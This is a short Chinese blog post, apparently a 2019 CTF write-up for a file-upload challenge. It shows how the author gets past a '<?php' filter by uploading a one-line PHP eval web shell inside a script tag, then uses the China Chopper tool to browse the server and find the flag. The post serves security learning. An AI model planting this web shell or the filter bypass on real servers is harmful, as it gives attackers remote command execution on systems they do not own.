Upload

这道题貌似是一道简单上传题,原本想的是使用一句话木马,不管了先随便写个简单的php上传上去,然后点击上传成功的链接进去看看,发现我们的代码被原封不动的打印出来了,多次尝试后发现<?phpphp被过滤了。。。。

所以这里我们就不使用<?php

修改代码为

<script language="PHP">

@eval($_POST["cmd"]);

</script>

就可以避开<?php的使用了,然后上传上传,点开上传成功就可以看到我们文件的所在了,这里我的是123.php所以url栏就是

然后我们使用中国菜刀创建新连接

然后双击进去就可以进入后台目录了

htmll中找到flag

点开就可以看到flag

 

posted @ 2019-07-24 21:28  七星易  阅读(924)  评论(0编辑  收藏  举报